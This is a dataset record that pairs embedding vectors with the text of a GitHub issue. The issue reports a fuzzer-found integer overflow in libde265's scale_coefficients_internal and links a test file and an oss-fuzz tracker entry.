0.017551662400364876, -0.004555319435894489, -0.005723928101360798, 0.001971825724467635, 0.015233761630952358, -0.00014969777839723974, 0.008357320912182331, -0.003731176955625415, 0.016148043796420097, 0.018362928181886673, 0.00866637472063303, -0.021041391417384148, -0.02476290985941887, -0.005427751690149307, 0.009181464090943336, 0.028072359040379524, -0.010012045502662659, 0.0020394311286509037, -0.013804389163851738, -0.018749244511127472, -0.026127897202968597, -0.008305812254548073, 0.004024134017527103, -0.015877623111009598, -0.01768043451011181, 0.011847049929201603, 0.01197582297027111, 0.013212036341428757, -0.03067355789244175, 0.0016531142173334956, -0.007024527993053198, -0.02159511297941208, -0.027170952409505844, -0.008705006912350655, 0.009709429927170277, -0.005334391724318266, 0.0007263561710715294, -0.02848443016409874, 0.0060201045125722885, 0.031394682824611664, 0.006135999225080013, 0.006119902711361647, 0.008074021898210049, 0.004468398168683052, -0.006541632115840912, 0.017860716208815575, -0.014641408808529377, 0.007700582500547171, -0.008338005281984806, 0.014718672260642052, 0.013134772889316082, 0.007088914513587952, 0.03227033466100693, -0.028304148465394974, -0.009142831899225712, -0.007127546239644289, 0.014937585219740868, -0.0013818875886499882, 0.009245850145816803, -0.012375016696751118, 0.008318689651787281, -0.004680872429162264, -0.009078445844352245, -0.009419692680239677, -0.004416889511048794, 0.008872410282492638, 0.02082247845828533, -0.016070781275629997, 0.0014237385476008058, 0.01959914155304432, -0.01334080845117569, -0.01827278733253479, -0.0014261531177908182, -0.004960952326655388, -0.009097762405872345, 0.0062036048620939255, -0.019727913662791252, -0.002783091040328145, -0.00775853032246232, 0.00010321903391741216, -0.004928759299218655, 0.006979458034038544, -0.0008084485307335854, -0.006766983773559332, -0.004075642675161362, -0.010398361831903458, -0.007732775993645191, -0.015117865987122059, 0.010340414941310883, 0.0007114668842405081, 0.004693749826401472, -0.013173405081033707, -0.0004466788668651134, -0.014963340014219284, -0.008505409583449364, -0.01142854057252407, -0.024016031995415688, -0.0060201045125722885, -0.02796933986246586, 0.005305418279021978, -0.01976654678583145, 0.016688888892531395, 0.0037537121679633856, -0.00007499979983549565, 0.00736577482894063, 0.027145197615027428, 0.008891725912690163, 0.015581446699798107, 0.016894923523068428, 0.010436994023621082, -0.002298585372045636, 0.029205555096268654, 0.00016710216004867107, -0.0013722296571359038, 0.0019492905121296644, 0.027093689888715744, 0.009162148460745811, -0.00847321655601263, 0.003055122448131442, 0.005063970107585192, 0.008614866062998772, -0.030699312686920166, -0.012529543600976467, 0.022960098460316658, 0.032888442277908325, 0.004217292182147503, 0.012806403450667858, -0.0017609610222280025, 0.011151679791510105, -0.003908238839358091, -0.005488918628543615, -0.015452674590051174, -0.004610047675669193, 0.013701370917260647, -0.0005404411931522191, 0.003274035407230258, -0.012793526984751225, -0.01177622564136982, 0.012220489792525768, 0.007739214226603508, 0.009529149159789085, -0.003959747962653637, 0.0028217227663844824, 0.007964566349983215, -0.011505804024636745, 0.01917419396340847, -0.0038631686475127935, -0.016263939440250397, -0.0015356094809249043, -0.0010744438041001558, 0.024930315092206, 0.009323113597929478, -0.010436994023621082, -0.001744864508509636, -0.005620910320430994, 0.006071613170206547, 0.015620077960193157, -0.022509396076202393, 0.03332626819610596, -0.0034285620786249638, -0.02508484199643135, 0.0038020017091184855, -0.028613202273845673, 0.0045681968331336975, 0.007185493595898151, 0.006844247225672007, -0.016714641824364662, -0.011531557887792587, 0.01909692957997322, 0.0005022119148634374, 0.022058691829442978, -0.023037362843751907, 0.01694643311202526, -0.007552494760602713, -0.0018575402209535241, -0.013881652615964413, 0.02171100676059723, 0.0053859008476138115, 0.010076431557536125, 0.01882650889456272, -0.0018333954503759742, 0.010340414941310883, 0.015169375576078892, 0.0028732316568493843, -0.009786693379282951, 0.00039456633385270834, 0.005550085566937923, -0.007604003418236971, -0.00470662722364068, -0.004886908456683159, -0.009638605639338493, 0.009516271762549877, -0.006367789581418037, -0.007713459897786379, -0.003908238839358091, -0.0021408393513411283, 0.04167071357369423, 0.01756454072892666, 0.00886597204953432, 0.011299768462777138, -0.0034221236128360033, 0.03888922929763794, 0.008395953103899956, 0.005678857676684856, -0.0032064300030469894, -0.0007621709955856204, -0.008498970419168472, -0.0127548947930336, 0.008041828870773315, -0.009535587392747402, -0.015954885631799698, -0.021298935636878014, -0.003930774051696062, -0.00876295380294323, -0.005743243731558323, 0.003143653506413102, 0.012284875847399235, 0.002179470844566822, -0.0012531153624877334, -0.010881258174777031, -0.0027331917081028223, -0.00561447162181139, 0.008872410282492638, -0.03904375806450844, 0.0015613639261573553, -0.022316237911581993, -0.003162969369441271, 0.02301160804927349, 0.00110824650619179, -0.014860321767628193, 0.0156844649463892, -0.008917480707168579, -0.021080022677779198, -0.019612019881606102, 0.0019026105292141438, -0.00878227036446333, -0.003872826462611556, -0.01683053746819496, 0.01721685379743576, -0.0100377993658185, 0.01971503719687462, -0.018671981990337372, -0.007726337295025587, -0.003303009085357189, 0.004169002640992403, 0.008267180994153023, 0.010333975777029991, -0.020139984786510468, 0.00046036092680878937, -0.00005042742850491777, 0.0038599492982029915, -0.0068571241572499275, 0.035978976637125015, -0.015993518754839897, 0.004500591196119785, 0.011808418668806553, 0.008228548802435398, -0.015001971274614334, 0.0023758485913276672, -0.008286496624350548, -0.006023323629051447, 0.00019265541050117463, -0.02151784859597683, -0.000014637786989624146, -0.007636196445673704, -0.02226472832262516, -0.008833779022097588, 0.02230335958302021, -0.0021730323787778616, 0.020835356786847115, 0.002565787872299552, -0.009149271063506603, -0.01589049957692623, 0.010475625284016132, 0.0051058209501206875, -0.022020060569047928, -0.0039887214079499245, -0.0036700102500617504, -0.010230958461761475, -0.01412631943821907, 0.004404012113809586, -0.010861942544579506, -0.003272425616160035, -0.004960952326655388, -0.009078445844352245, 0.01052713394165039, 0.005089724436402321, 0.018556086346507072, 0.01873636804521084, -0.018556086346507072, -0.012799965217709541, -0.01670176535844803, 0.04406587779521942, -0.008357320912182331, 0.0006490927771665156, -0.015323902480304241, -0.0016313839005306363, 0.001142853987403214, 0.00012877228436991572, 0.001907439436763525, -0.001077663036994636, -0.017899347469210625, -0.00730782700702548, -0.011982261203229427, 0.001498587429523468, 0.003544457256793976, -0.005009241867810488, -0.0001872228313004598, -0.001187119516544044, -0.00006247468263609335, -0.0034414392430335283, -0.01925145648419857, 0.008112654089927673, -0.018221277743577957, -0.015954885631799698, -0.0017641803715378046, -0.008904603309929371, -0.007745652925223112, 0.010913451202213764, -0.0021215234883129597, -0.01412631943821907, -0.029952432960271835, 0.01737138070166111, 0.019315842539072037, -0.0033094477839767933, -0.0004579464439302683, 0.004059546161442995, -0.016135167330503464, 0.01976654678583145, 0.025677192956209183, 0.013353685848414898, -0.004281678702682257, -0.008209233172237873, 0.01623818464577198, 0.0024176996666938066, -0.0250075776129961, -0.017590293660759926, -0.024016031995415688, 0.017616048455238342, 0.003876045811921358, -0.02280557155609131, 0.01488607656210661, 0.0045134685933589935, 0.011518681421875954, 0.008833779022097588, 0.012259121984243393, -0.007455915212631226, -0.02558705396950245, -0.007520301733165979, 0.00697301933541894, 0.008460339158773422, 0.0150663573294878, -0.021582234650850296, 0.010784679092466831, -0.008016075007617474, -0.003924335353076458, 0.0024708183482289314, -0.0100377993658185, -0.007166177500039339, -0.01733274944126606, -0.002419309224933386, -0.015040603466331959, -0.0007283682352863252, -0.01800236478447914, -0.012194735929369926, 0.013379440642893314, 0.014808813109993935, 0.0010438603349030018, -0.0027396304067224264, -0.0009062349563464522, -0.0027686040848493576, 0.01771906577050686, -0.018285663798451424, 0.010205203667283058, 0.0034414392430335283, -0.00714042317122221, 0.002556129824370146, 0.005682077258825302, -0.020062722265720367, -0.013958916068077087, -0.0018430533818900585, -0.003146872855722904, -0.01784783974289894, -0.0018768560839816928, 0.0025432526599615812, 0.014023302122950554, 0.02359108254313469, 0.0010591520695015788, 0.0022148832213133574, 0.01424221508204937, 0.010256712324917316, -0.008093338459730148, -0.0061488766223192215, -0.021723885089159012, -0.0027959682047367096, -0.0024965726770460606, 0.01885226182639599, -0.00823498796671629, -0.004983487538993359, 0.002971420530229807, 0.002789529738947749, 0.01881363056600094, -0.013315054588019848, 0.01428084634244442, -0.005318295210599899, 0.022792695090174675, -0.00746235391125083, -0.025458281859755516, 0.0003426549956202507, -0.006354912184178829, -0.009110638871788979, -0.004117493983358145, 0.007681266870349646, -0.028587447479367256, 0.015208006836473942, 0.007133984472602606, 0.01944461464881897, 0.02159511297941208, 0.01804099790751934, 0.03172948956489563, -0.000655129028018564, -0.019946826621890068, -0.03943007439374924, 0.020101353526115417, 0.0009875224204733968, -0.0009110639221034944, 0.00902049895375967, -0.0078229159116745, 0.019354473799467087, -0.00006861148722236976, 0.0029569335747510195, -0.006126341409981251, 0.00036599498707801104, -0.007488108240067959, 0.0033641760237514973, -0.00023863113892730325, -0.005208839196711779, 0.001147683011367917, 0.009374622255563736, -0.0038309756200760603, -0.0013915455201640725, 0.008537602610886097, -0.015942009165883064, 0.0014028131263330579, -0.005192742217332125, -0.012439402751624584, -0.01103578507900238, -0.025226490572094917, 0.014139196835458279, 0.00404023053124547, -0.0010446651140227914, 0.0005959742120467126, 0.0023243397008627653, -0.015645831823349, 0.009735184721648693, 0.012239805422723293, -0.00020331937412265688, -0.0013271593488752842, 0.01683053746819496, -0.02042328380048275, -0.0007114668842405081, 0.00775853032246232, 0.003763369983062148, 0.011943629942834377, 0.022213218733668327, -0.0031178989447653294, -0.009278043173253536, -0.023758485913276672, 0.007584687788039446, 0.006049077957868576, -0.013817266561090946, -0.022908588871359825, -0.0035605537705123425, 0.003195162396878004, 0.014860321767628193, 0.015980640426278114, -0.004735600668936968, 0.011544435285031796, 0.009194341488182545, 0.004690530709922314, -0.010604397393763065, -0.001310258056037128, 0.020024091005325317, 0.010353291407227516, 0.0101343784481287, -0.009670798666775227, 0.010623713955283165, 0.007352897431701422, -0.0004245461313985288, 0.004082081373780966, -0.01881363056600094, 0.008189917542040348, -0.009638605639338493, 0.006422517821192741, -0.006457929965108633, -0.02276694029569626, -0.02366834692656994, 0.009535587392747402, -0.02516210451722145, -0.0004535198968369514, 0.010218081064522266, 0.0068378085270524025, -0.0070760371163487434, 0.016804782673716545, -0.007996759377419949, -0.010636590421199799, 0.008350882679224014, -0.02527800016105175, -0.0001975849736481905, -0.008801585994660854, -0.014190705493092537, 0.008788708597421646, -0.01408768817782402, -0.015349656343460083, 0.01162169873714447, -0.010559327900409698, 0.026630109176039696, 0.00007550281588919461, -0.003357737325131893, -0.00876295380294323, -0.008408830501139164, -0.0040853009559214115, 0.01600639522075653, 0.0075331786647439, 0.011351277120411396, -0.01461565401405096, -0.011744032613933086, 0.00027384230634197593, 0.0040498883463442326, 0.023153256624937057, -0.017744820564985275, -0.0061295609921216965, 0.016521483659744263, 0.0028152840677648783, -0.024582630023360252, -0.002174641937017441, 0.019393106922507286, -0.016637379303574562, -0.026630109176039696, -0.006908633280545473, -0.008492532186210155, -0.011924313381314278, -0.018517455086112022, 0.004259143490344286, -0.013212036341428757, -0.0029279598966240883, -0.021698130294680595, -0.020835356786847115, -0.018259910866618156, 0.01992107182741165, 0.0039211162365973, 0.02652708999812603, 0.009400377050042152, 0.021041391417384148, -0.014744427055120468, 0.0305190309882164, 0.008061145432293415, -0.0019782641902565956, -0.02203293889760971, 0.017899347469210625, 0.0057754372246563435, -0.02065507508814335, 0.004114274401217699, 0.0014028131263330579, 0.013572598807513714, 0.03245061635971069, -0.01295449212193489, 0.01379151176661253, -0.022020060569047928, 0.002237418433651328, 0.006432175636291504, -0.0015694121830165386, 0.007288511376827955, 0.004787109792232513, -0.0005106626194901764, 0.004729162435978651, 0.009709429927170277, 0.0025384237524122, 0.013379440642893314, 0.004165783524513245, 0.023449433967471123, -0.0023967742454260588, 0.010424116626381874, -0.0198824405670166, 0.026964915916323662, 0.014989093877375126, -0.0009657921618781984, 0.006902194581925869, 0.0031597500201314688, -0.01635408028960228, 0.0024450637865811586, -0.021492093801498413, 0.013907406479120255, -0.006940826307982206, -0.023385047912597656, 0.0037215191405266523, 0.016997940838336945, 0.007037405390292406, -0.0017818865599110723, -0.021260304376482964, -0.0009344039135612547, -0.0012667973060160875, -0.0018591498956084251, -0.01771906577050686, -0.003275644965469837, -0.021801147609949112, -0.02491743676364422, -0.02015286311507225, -0.001190338865853846, -0.013327931985259056, -0.01760317198932171, 0.0024692085571587086, -0.016688888892531395, -0.01596776396036148, -0.005637006834149361, 0.012935176491737366, 0.012838596478104591, 0.0036120626609772444, 0.020294511690735817, 0.004880469758063555, 0.0007802795735187829, 0.011628136970102787, 0.013057509437203407, 0.01710096001625061, -0.006689720321446657, 0.0020394311286509037, -0.010501380078494549, -0.025934739038348198, 0.0014502978883683681, 0.0022760501597076654, -0.01408768817782402, -0.002454721601679921, 0.0078229159116745, 0.00837663747370243, 0.027170952409505844, -0.009232972748577595, 0.003930774051696062, -0.013649862259626389, 0.0007030161796137691, 0.0003710251476150006, 0.03626227751374245, 0.017577417194843292, 0.01612229086458683, -0.011409224942326546, -0.02023012563586235, 0.021801147609949112, 0.011628136970102787, -0.00802251324057579, 0.009265165776014328, 0.00022716236708220094, -0.01038548443466425, -0.006248675286769867, 0.0030132716055959463, -0.02794358693063259, 0.020243003964424133, -0.0027444593142718077, 0.003966186195611954, -0.015014848671853542, -0.004284897819161415, -0.0014253482222557068, -0.001801202306523919, -0.009471201337873936, -0.007932372391223907, 0.004423328209668398, 0.00007927543629193678, -0.00817704014480114, -0.010507818311452866, 0.011158118955790997, -0.019380228593945503, -0.015285270288586617, 0.019238580018281937, 0.004468398168683052, 0.010842626914381981, 0.0021134752314537764, -0.011177434585988522, 0.00697301933541894, 0.01690780185163021, 0.021298935636878014, -0.008833779022097588, -0.016959309577941895, 0.008505409583449364, -0.010230958461761475, 0.0032547195442020893, -0.017126714810729027, -0.009207218885421753, 0.007913056761026382, 0.02042328380048275, 0.004188318736851215, 0.019702158868312836, 0.003267596708610654, -0.018633348867297173, -0.010501380078494549, -0.005250690039247274, 0.0033995884004980326, 0.02163374423980713, 0.013662739656865597, -0.006155315320938826, -0.002342046005651355, 0.00704384408891201, -0.008930358104407787, -0.021105777472257614, -0.008659936487674713, 0.014139196835458279, 0.02683614380657673, 0.024827295914292336, 0.020436162129044533, -0.00886597204953432, 0.021144408732652664, 0.026346810162067413, -0.007571810390800238, -0.016251062974333763, 0.015826113522052765, 0.034407954663038254, 0.009381061419844627, 0.014512636698782444, 0.018105383962392807, -0.005955718457698822, 0.008035390637814999, 0.008563357405364513, 0.01984380930662155, 0.040795061737298965, 0.0029311792459338903, -0.01581323705613613, -0.006709035951644182, 0.009226534515619278, 0.030493278056383133, -0.0067476676777005196, -0.01030822191387415, 0.00856979563832283, -0.01854320988059044, 0.000574646343011409, 0.01686916872859001, -0.019148439168930054, 0.0017802768852561712, 0.00561447162181139, 0.004394354298710823, 0.014989093877375126, -0.02297297492623329, 0.02312750183045864, -0.009439008310437202, -0.011692523956298828, 0.0003961759794037789, 0.012297753244638443, -0.009690114296972752, 0.023642592132091522, -0.021028514951467514, -0.0034189042635262012, -0.0032547195442020893, 0.019341597333550453, 0.015594324097037315, 0.006934387609362602, -0.005298979580402374, -0.029334327206015587, -0.017461521551012993, 0.006432175636291504, 0.0031227278523147106, 0.00044225231977179646, -0.002037821337580681, 0.007752091623842716, -0.0048064254224300385, -0.009426130913197994, 0.008576233871281147, 0.004680872429162264, -0.026166528463363647, -0.012883666902780533, -0.009226534515619278, 0.005298979580402374, -0.025149228051304817, -0.0010841017356142402, -0.01330217719078064, 0.011911436915397644, -0.022097324952483177, -0.028664710000157356, 0.00005985899406368844, 0.0037472734693437815, 0.026630109176039696, -0.011847049929201603, 0.020024091005325317, -0.0031146795954555273, -0.023565327748656273, -0.02124742791056633, 0.009445447474718094, 0.012748456560075283, 0.011145241558551788, 0.027145197615027428, 0.006187508348375559, -0.010366168804466724, -0.007262757048010826, 0.014229337684810162, -0.0156844649463892, -0.004329968243837357, 0.020951250568032265, 0.012239805422723293, 0.0025995904579758644, -0.0017641803715378046, -0.010179448872804642, -0.004629363771528006, 0.002314681885764003, -0.005315076094120741, 0.0006281672976911068, 0.012671193107962608, -0.0029005957767367363, -0.005627349019050598, -0.016804782673716545, -0.01777057535946369, -0.009883273392915726, -0.01089413557201624, -0.003077657660469413, 0.00196055811829865, -0.009986290708184242, 0.00593640236184001, 0.006754106376320124, 0.008943235501646996, 0.014010424725711346, 0.005199180915951729, -0.013611230999231339, 0.00672191334888339, -0.0010631761979311705, 0.013115457259118557, -0.0031018024310469627, -0.0009456714615225792, 0.001281284261494875, -0.01201445423066616, -0.025535544380545616, -0.008222110569477081, 0.013063948601484299, -0.007507424335926771, -0.01093920599669218, -0.008260741829872131, 0.004857934545725584, -0.010398361831903458, 0.001279674586839974, 0.006786299403756857, 0.010668783448636532, 0.024157680571079254, -0.008846656419336796, -0.009496956132352352, -0.005772217642515898, 0.013482457958161831, 0.01281284261494875, -0.0019170973682776093, -0.010984276421368122, -0.004056327044963837, -0.00817704014480114, 0.0021649841219186783, -0.01344382669776678, -0.03654557466506958, 0.003198381746187806, -0.02468564733862877, 0.009162148460745811, 0.011956506408751011, 0.019225701689720154, 0.00941325444728136, 0.0006233383319340646, 0.011183872818946838, -0.016920678317546844, 0.002644660882651806, 0.021260304376482964, 0.0065931412391364574, -0.020487669855356216, -0.0061488766223192215, -0.008028952404856682, 0.0030969735234975815, 0.03203854337334633, 0.010849065147340298, 0.044941529631614685, -0.012516666203737259, 0.013115457259118557, 0.021260304376482964, -0.007410845253616571, -0.009619290009140968, -0.008447461761534214, -0.00886597204953432, 0.020371776074171066, 0.011029345914721489, 0.000018724798792391084, 0.008260741829872131, 0.0128514738753438, -0.004854714963585138, 0.0059106480330228806, 0.0014663944020867348, -0.025793088600039482, 0.0031404341571033, -0.004571415949612856, -0.01929008774459362, 0.004999584052711725, 0.01305107120424509, 0.02297297492623329, 0.0019525097450241446, 0.005920305848121643, -0.008589111268520355, 0.031137138605117798, -0.01107441633939743, 0.013714248314499855, -0.031317420303821564, 0.037498489022254944, 0.010758924297988415, -0.008544040843844414, -0.011943629942834377, -0.01211103331297636, 0.010024922899901867, -0.0153754111379385, 0.011473610997200012, 0.011061538942158222, -0.026913408190011978, 0.010784679092466831, -0.003515483345836401, -0.02887074649333954, -0.0063130613416433334, 0.0008442632970400155, 0.013141212053596973, -0.006870001554489136, 0.00016720277199056, 0.01654723845422268, 0.012523104436695576, 0.018800754100084305, 0.016650255769491196, 0.00425592390820384, 0.0034575359895825386, -0.02289571240544319, 0.015104989521205425, 0.01271626353263855, 0.0000368459768651519, -0.01894240267574787, 0.02089974284172058, 0.0019154878100380301, -0.03649406507611275, -0.006618895567953587, 0.012117472477257252, -0.012020892463624477, 0.004716285038739443, -0.0025384237524122, 0.017203977331519127, -0.01054645050317049, 0.03837414085865021, -0.010746046900749207, -0.0063291578553617, 0.0005505015142261982, -0.0202687568962574, 0.008028952404856682, 0.014692917466163635, 0.013740003108978271, -0.005092944018542767, 0.00365391350351274, 0.01113236416131258, -0.007752091623842716, 0.015336778946220875, 0.012143226340413094, -0.011937190778553486, 0.01187280472368002, -0.02093837410211563, -0.0039887214079499245, 0.005559743382036686, -0.003679668065160513, 0.009123516269028187, 0.02990092523396015, 0.019830932840704918, -0.012529543600976467, -0.025690071284770966, 0.012999562546610832, -0.01612229086458683, -0.004008037503808737, -0.01117099542170763, 0.0026913408655673265, -0.0049770488403737545, 0.007217686623334885, 0.0013690103078261018, -0.029643381014466286, 0.0011074416106566787, 0.011995138600468636, -0.028664710000157356, -0.01733274944126606, -0.013173405081033707, -0.0036635715514421463, 0.006123122293502092, 0.00643539521843195, -0.006406421307474375, -0.013521090149879456, 0.003966186195611954, -0.012310630641877651, -0.0033641760237514973, -0.029179800301790237, -0.015645831823349, 0.008653497323393822, -0.013894530013203621, -0.009863956831395626, 0.0005963766598142684, -0.00936818402260542, -0.021067146211862564, 0.009638605639338493, -0.023758485913276672, -0.007359336130321026, -0.014074810780584812, 0.020500548183918, -0.01869773678481579, 0.002486914861947298, -0.013224913738667965, 0.015040603466331959, 0.0022535149473696947, 0.0005774632445536554, 0.003847072133794427, -0.004880469758063555, -0.0016168970614671707, -0.005640225950628519, 0.010359730571508408, -0.0065384129993617535, 0.040202707052230835, -0.018800754100084305, 0.006052297540009022, -0.00010774618567666039, 0.0070953527465462685, 0.0063742282800376415, -0.008891725912690163, -0.005334391724318266, -0.021376200020313263, 0.0041947574354708195, -0.014049055986106396, 0.031085629016160965, -0.0023887259885668755, -0.005363365635275841, 0.014370987191796303, -0.0002424540725769475, 0.02359108254313469, 0.0026333932764828205, 0.016212431713938713, -0.006657527294009924, 0.0007468792609870434, -0.022290483117103577, -0.004101397469639778, 0.008441023528575897, 0.008479654788970947, 0.0038277562707662582, 0.007005212362855673, 0.023269152268767357, -0.0012563345953822136, -0.004011256620287895, -0.004320310428738594, -0.013881652615964413, -0.0034832903183996677, -0.002026553964242339, -0.01158306747674942, 0.010803994722664356, 0.0036989839281886816, -0.006071613170206547, 0.0126583157107234, -0.005604813806712627, 0.021736761555075645, -0.031291663646698, 0.015645831823349, 0.008737199939787388, -0.005260347854346037, -0.015568569302558899, -0.0016692107310518622, 0.014010424725711346, -0.0016120680375024676, -0.0010696147801354527, -0.013418071903288364, -0.0006599579937756062, 0.009348868392407894, -0.029257062822580338, -0.005659542046487331, 0.011454294435679913, -0.0038921423256397247, 0.015903377905488014, -0.011866366490721703, 0.004584293346852064, -0.01702369563281536, -0.00687644025310874, 0.0304417684674263 ]
null
null
null
null
null
null
null
null
null
[ "strukturag", "libde265" ]
The https://github.com/ImageMagick project is using the oss-fuzz tooling of google and with the attached file there is an integer overflow in `scale_coefficients_internal`. https://github.com/strukturag/libde265/blob/e587ef6e8000662b91c35ccb866c2374d3a40e27/libde265/slice.cc#L3369 [test.zip](https://github.com/strukturag/libde265/files/9033594/test.zip) https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48427
Integer-overflow · void scale_coefficients_internal<unsigned short>
https://api.github.com/repos/strukturag/libde265/issues/323/comments
2
2022-07-02T19:31:25
2023-01-27T16:22:32Z
https://github.com/strukturag/libde265/issues/323
1,292,126,072
323
false
This is a GitHub Issue repo:libde265 owner:strukturag Title : Integer-overflow · void scale_coefficients_internal<unsigned short> Issue date: --- start body --- The https://github.com/ImageMagick project is using the oss-fuzz tooling of google and with the attached file there is an integer overflow in `scale_coefficients_internal`. https://github.com/strukturag/libde265/blob/e587ef6e8000662b91c35ccb866c2374d3a40e27/libde265/slice.cc#L3369 [test.zip](https://github.com/strukturag/libde265/files/9033594/test.zip) https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48427 --- end body ---
607
[ -0.017268719151616096, 0.029373101890087128, -0.010661621578037739, 0.013976269401609898, 0.07813096791505814, -0.0034348771441727877, -0.020479785278439522, 0.05995960161089897, -0.03749694675207138, 0.018541308119893074, -0.025170601904392242, 0.023202531039714813, -0.0004057760816067457, 0.03370877727866173, 0.012918245978653431, 0.02305455505847931, -0.033235255628824234, -0.0021012495271861553, -0.016247689723968506, -0.014656955376267433, -0.008094250224530697, -0.025229793041944504, -0.007365471683442593, 0.03711220994591713, -0.028500046581029892, 0.009936543181538582, -0.004516946617513895, -0.008175636641681194, 0.004435560200363398, 0.026354404166340828, 0.04424462094902992, 0.030630892142653465, -0.021604396402835846, -0.000022326354155666195, 0.057739969342947006, -0.021515611559152603, 0.05486924946308136, 0.043652720749378204, 0.00094981660367921, 0.00441706320270896, 0.020272620022296906, -0.04915740340948105, -0.044363003224134445, 0.05756239965558052, -0.006011497229337692, -0.017860621213912964, 0.025644123554229736, -0.004909081384539604, -0.025925276800990105, -0.006873453501611948, 0.01422042865306139, -0.04326798394322395, -0.02512620948255062, -0.04021969065070152, -0.02512620948255062, -0.03243619203567505, 0.030660485848784447, 0.04776643216609955, 0.004280186258256435, 0.02375003881752491, -0.02878119982779026, 0.012429927475750446, -0.010461855679750443, 0.015345040708780289, -0.0024508412461727858, 0.020302213728427887, -0.015818562358617783, 0.048003192991018295, -0.02506702020764351, 0.033324044197797775, -0.04004212096333504, -0.034300681203603745, 0.026310011744499207, 0.04841752350330353, 0.018200963735580444, -0.004172903951257467, 0.014686550945043564, 0.008449390530586243, -0.04741129279136658, 0.005426994990557432, -0.03554367274045944, 0.04424462094902992, -0.03882872313261032, 0.01709114946424961, 0.037319377064704895, 0.00694374181330204, -0.03942062705755234, -0.07676959782838821, -0.05584588646888733, -0.011001965031027794, -0.01609971560537815, 0.03412310779094696, 0.003566205268725753, 0.01237073726952076, 0.00014462275430560112, 0.011586467735469341, -0.02805612049996853, -0.01843772456049919, -0.06019636243581772, -0.002478586742654443, -0.03983495756983757, -0.0024563902989029884, 0.005301215685904026, -0.010225094854831696, 0.0004298220737837255, 0.013532343320548534, -0.010676419362425804, -0.00038774157292209566, 0.003375686937943101, 0.10843631625175476, 0.029032757505774498, -0.012548306956887245, -0.036342740058898926, -0.006514613516628742, 0.013584134168922901, 0.02648758329451084, 0.03074927255511284, 0.012489116750657558, -0.02743462473154068, -0.008234826847910881, -0.007524545304477215, -0.013118011876940727, -0.03811844438314438, 0.031637124717235565, -0.023676050826907158, 0.033264853060245514, 0.0006903973408043385, -0.02207791805267334, 0.010454456321895123, -0.030571701005101204, -0.04326798394322395, -0.017831025645136833, 0.015922144055366516, -0.03909508138895035, -0.008286617696285248, -0.010395266115665436, -0.006214963737875223, 0.05492844060063362, 0.02271421253681183, 0.015507813543081284, -0.028603630140423775, -0.010876186192035675, 0.02411997690796852, 0.00023641370353288949, -0.0017405597027391195, 0.007968471385538578, -0.024563902989029884, -0.00004260070636519231, -0.002125295577570796, -0.01879286579787731, -0.027523409575223923, 0.00279858335852623, 0.047026555985212326, -0.00611877953633666, 0.056733738631010056, 0.020154239609837532, 0.012400331906974316, 0.06706241518259048, 0.018881650641560555, -0.041640255600214005, -0.02104208990931511, -0.03646111860871315, 0.023246923461556435, -0.037260185927152634, -0.001554665737785399, -0.02441592887043953, 0.016913579776883125, 0.03873993828892708, 0.0015814861981198192, 0.032613761723041534, 0.03533650562167168, -0.004235793370753527, -0.012030393816530704, 0.021648788824677467, -0.03619476407766342, -0.009433426894247532, -0.0017572069773450494, 0.027375435456633568, -0.007443158887326717, -0.030926842242479324, -0.037970468401908875, -0.01454597432166338, 0.011793632991611958, -0.0062038651667535305, 0.02175237238407135, -0.04513247311115265, 0.03714180737733841, 0.0013438009191304445, 0.011179535649716854, -0.025200197473168373, 0.024179168045520782, -0.0003213839081581682, 0.025200197473168373, -0.019221995025873184, 0.01905922219157219, -0.03533650562167168, -0.04081159457564354, -0.017964204773306847, 0.023306112736463547, -0.0011606814805418253, 0.011371903121471405, -0.016558438539505005, -0.030334940180182457, -0.018467320129275322, -0.016602830961346626, 0.008123844861984253, -0.009159672074019909, 0.020923711359500885, -0.014331409707665443, -0.03672747313976288, -0.0346854142844677, 0.012341141700744629, -0.00853077694773674, 0.018467320129275322, -0.008220029063522816, 0.013073619455099106, -0.02616203762590885, 0.024223560467362404, -0.009396432898938656, -0.023557670414447784, 0.034655820578336716, -0.030305346474051476, 0.0018607897218316793, -0.03178510069847107, -0.04057483375072479, -0.011127743870019913, 0.01238553412258625, 0.003987934906035662, -0.010069720447063446, 0.00034658596268855035, -0.006877153180539608, -0.031193198636174202, -0.026028858497738838, 0.004254290368407965, 0.03418229892849922, -0.023661253973841667, -0.00759853282943368, -0.011801032349467278, -0.017520278692245483, -0.009633193723857403, -0.0021197465248405933, 0.04652344062924385, 0.0040619224309921265, -0.014250023290514946, 0.0025100314524024725, 0.024815460667014122, 0.01055803894996643, 0.0012318945955485106, -0.015167470090091228, 0.005748841445893049, -0.010321279056370258, -0.016306880861520767, 0.006200165953487158, 0.015626193955540657, -0.006555306725203991, 0.04309041425585747, 0.01221536286175251, 0.04983808845281601, -0.03110441192984581, 0.004054524004459381, 0.028278084471821785, -0.017179934307932854, -0.011349706910550594, -0.0171059463173151, -0.02076093852519989, 0.009522211737930775, -0.012977436184883118, -0.007694716565310955, -0.029669051989912987, -0.0729222372174263, 0.021959537640213966, -0.025821693241596222, -0.0026228625793009996, -0.013007030822336674, 0.0022584733087569475, -0.00770951434969902, 0.002963205799460411, 0.02670954540371895, 0.01151247974485159, 0.01001792959868908, -0.013761704787611961, 0.022137107327580452, -0.017609063535928726, 0.03441905975341797, 0.009906947612762451, 0.013776502572000027, 0.013554539531469345, -0.02743462473154068, -0.05359666049480438, -0.03350161388516426, -0.01441279612481594, 0.020568570122122765, -0.05460289493203163, 0.0022991665173321962, 0.003029794665053487, -0.021278850734233856, -0.008782335557043552, -0.01574457436800003, -0.011401498690247536, -0.0023287616204470396, -0.05756239965558052, 0.005175436846911907, 0.020228225737810135, -0.052383262664079666, -0.04312000796198845, -0.00476850476115942, -0.013576735742390156, 0.01608491688966751, -0.019621526822447777, -0.018541308119893074, 0.050074849277734756, -0.011172137223184109, -0.005948607809841633, -0.018866853788495064, -0.020213428884744644, 0.0027079484425485134, 0.014375802129507065, -0.022965770214796066, -0.01570018194615841, -0.009167071431875229, -0.012999632395803928, 0.017165137454867363, -0.03856236860156059, 0.03652030974626541, 0.003051991108804941, -0.03652030974626541, -0.02638399973511696, 0.03169631212949753, -0.07682878524065018, 0.01556700374931097, 0.0003058927250094712, 0.00918926764279604, -0.008404998108744621, -0.02739023230969906, 0.018911246210336685, -0.0009646141552366316, -0.030364535748958588, 0.004546541720628738, 0.011172137223184109, 0.02740502916276455, -0.0020180135034024715, -0.0072248950600624084, 0.005563871935009956, -0.0008693549898453057, 0.022551439702510834, -0.021219661459326744, -0.018230559304356575, 0.0008587192860431969, 